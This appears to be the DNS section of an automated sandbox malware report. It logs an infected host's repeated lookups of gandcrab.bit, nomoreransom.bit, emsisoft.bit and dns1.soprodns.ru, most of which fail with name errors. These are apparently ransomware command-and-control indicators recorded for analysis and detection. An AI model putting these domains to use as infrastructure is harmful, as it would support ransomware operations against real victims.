Sep 1, 2022 00:03:34.095324039 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:03:34.286489964 CEST	192.168.2.3	8.8.8.8	0xbc05	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:35.289774895 CEST	192.168.2.3	8.8.8.8	0xbc05	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:35.959451914 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:35.979600906 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:36.001168966 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:03:36.023380995 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:36.045305967 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Sep 1, 2022 00:03:36.244251013 CEST	192.168.2.3	8.8.8.8	0x25c4	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:37.243447065 CEST	192.168.2.3	8.8.8.8	0x25c4	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:37.287781000 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:37.309587002 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:37.331573009 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:03:37.351948977 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	emsisoft.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:37.373698950 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	emsisoft.bit	28	IN (0x0001)
Sep 1, 2022 00:03:37.563853979 CEST	192.168.2.3	8.8.8.8	0x8bc	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:38.572907925 CEST	192.168.2.3	8.8.8.8	0x8bc	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:38.657994032 CEST	192.168.2.3	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:03:38.678469896 CEST	192.168.2.3	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:38.699985027 CEST	192.168.2.3	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Sep 1, 2022 00:03:38.722516060 CEST	192.168.2.3	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Sep 1, 2022 00:03:38.741457939 CEST	192.168.2.3	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 1, 2022 00:01:24.030497074 CEST	8.8.8.8	192.168.2.3	0x76ae	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:24.067482948 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:24.088715076 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:24.110754013 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:24.144764900 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:24.164725065 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:25.283262014 CEST	8.8.8.8	192.168.2.3	0xb801	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:25.327796936 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:25.346643925 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:25.366964102 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:25.385024071 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:25.405503035 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:27.449457884 CEST	8.8.8.8	192.168.2.3	0xa52f	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:27.481861115 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:27.502418995 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:27.520689964 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:27.550129890 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:27.573137045 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:34.108952045 CEST	8.8.8.8	192.168.2.3	0x9347	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:34.169861078 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:34.192428112 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:34.214257956 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:34.234899998 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:34.256675959 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:38.424983025 CEST	8.8.8.8	192.168.2.3	0x69c7	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:38.459913969 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:38.478588104 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:38.499536037 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:38.522388935 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:38.547306061 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:39.520437956 CEST	8.8.8.8	192.168.2.3	0x69c7	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:39.869720936 CEST	8.8.8.8	192.168.2.3	0xc269	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:39.914973974 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:39.951137066 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:39.971240997 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:39.989907026 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:40.010957003 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:40.783550978 CEST	8.8.8.8	192.168.2.3	0x69c7	Server failure (2)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:41.194181919 CEST	8.8.8.8	192.168.2.3	0xf1f3	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:41.280056000 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:41.300605059 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:41.320178032 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:41.341320992 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:41.369268894 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:42.639774084 CEST	8.8.8.8	192.168.2.3	0x8ba	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:42.685431004 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:42.707127094 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:42.729058981 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:42.750449896 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:42.771682978 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:43.786712885 CEST	8.8.8.8	192.168.2.3	0x25e1	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:43.837654114 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:43.857835054 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:43.878863096 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:43.902585030 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:43.922862053 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:45.412717104 CEST	8.8.8.8	192.168.2.3	0x51fb	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:45.450937986 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:45.472791910 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:45.495043039 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:45.514930964 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:45.535151958 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:46.863656044 CEST	8.8.8.8	192.168.2.3	0xb432	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:46.913108110 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:46.933680058 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:46.953710079 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:46.973721981 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:46.994463921 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:50.163376093 CEST	8.8.8.8	192.168.2.3	0x1543	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:50.211262941 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:50.265369892 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:50.285290956 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:50.507364035 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:50.561597109 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:50.793282986 CEST	8.8.8.8	192.168.2.3	0x1543	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:52.259315968 CEST	8.8.8.8	192.168.2.3	0x1543	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:53.162805080 CEST	8.8.8.8	192.168.2.3	0x84	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:53.225925922 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:53.246345043 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:53.271325111 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:53.289664030 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:53.310367107 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:54.812717915 CEST	8.8.8.8	192.168.2.3	0x1368	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:54.875181913 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:54.897751093 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:54.917856932 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:54.939847946 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:54.961664915 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:57.544912100 CEST	8.8.8.8	192.168.2.3	0xb069	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:57.616928101 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:57.637340069 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:57.657670021 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:57.680296898 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:57.700737000 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:59.361457109 CEST	8.8.8.8	192.168.2.3	0x34ae	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:59.421237946 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:01:59.443866014 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:59.462193966 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:01:59.482578039 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:01:59.500787973 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:00.540338039 CEST	8.8.8.8	192.168.2.3	0x6c80	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:00.602976084 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:00.623477936 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:00.645464897 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:00.665227890 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:00.686867952 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:01.711468935 CEST	8.8.8.8	192.168.2.3	0xe958	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:01.787820101 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:01.813957930 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:01.832298040 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:01.850697994 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:01.870028019 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:01.915724039 CEST	8.8.8.8	192.168.2.3	0xb069	Server failure (2)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:02.924088001 CEST	8.8.8.8	192.168.2.3	0xb441	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:02.983864069 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:03.004199028 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:03.022608995 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:03.041289091 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:03.060731888 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:04.694045067 CEST	8.8.8.8	192.168.2.3	0xf2b7	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:04.767615080 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:04.790055037 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:04.812170982 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:04.841615915 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:04.861390114 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:10.950472116 CEST	8.8.8.8	192.168.2.3	0x3f9e	Server failure (2)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:11.704813957 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:11.725864887 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:11.746112108 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:11.766913891 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:11.787333965 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:11.967653036 CEST	8.8.8.8	192.168.2.3	0x3f9e	Server failure (2)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:12.999161005 CEST	8.8.8.8	192.168.2.3	0x3f9e	Server failure (2)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:14.387511015 CEST	8.8.8.8	192.168.2.3	0x3f9e	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:14.971482038 CEST	8.8.8.8	192.168.2.3	0xfea3	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:15.014755964 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:15.035367012 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:15.056536913 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:15.078147888 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:15.099627018 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:16.448688984 CEST	8.8.8.8	192.168.2.3	0x80a9	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:16.488795042 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:16.509176016 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:16.530898094 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:16.553879023 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:16.580022097 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	emsisoft.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:16.991344929 CEST	8.8.8.8	192.168.2.3	0x731	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:17.021205902 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:17.048921108 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:17.068710089 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:17.089041948 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	gandcrab.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:17.109560966 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	gandcrab.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:17.505155087 CEST	8.8.8.8	192.168.2.3	0x80a9	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:18.361676931 CEST	8.8.8.8	192.168.2.3	0x84cb	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:18.389043093 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:18.408541918 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:18.427966118 CEST	8.8.8.8	192.168.2.3	0x3	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:18.449790001 CEST	8.8.8.8	192.168.2.3	0x4	Name error (3)	nomoreransom.bit	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:18.479060888 CEST	8.8.8.8	192.168.2.3	0x5	Name error (3)	nomoreransom.bit	none	none	28	IN (0x0001)
Sep 1, 2022 00:02:18.912440062 CEST	8.8.8.8	192.168.2.3	0xfea3	Server failure (2)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:19.401741028 CEST	8.8.8.8	192.168.2.3	0x49ea	Name error (3)	dns1.soprodns.ru	none	none	A (IP address)	IN (0x0001)
Sep 1, 2022 00:02:19.430453062 CEST	8.8.8.8	192.168.2.3	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 1, 2022 00:02:19.450289965 CEST	8.8.8.8	192.168.2.3	0x2	Name error (3)	emsisoft.bit	none	none	A (IP address)	IN (0x0001)
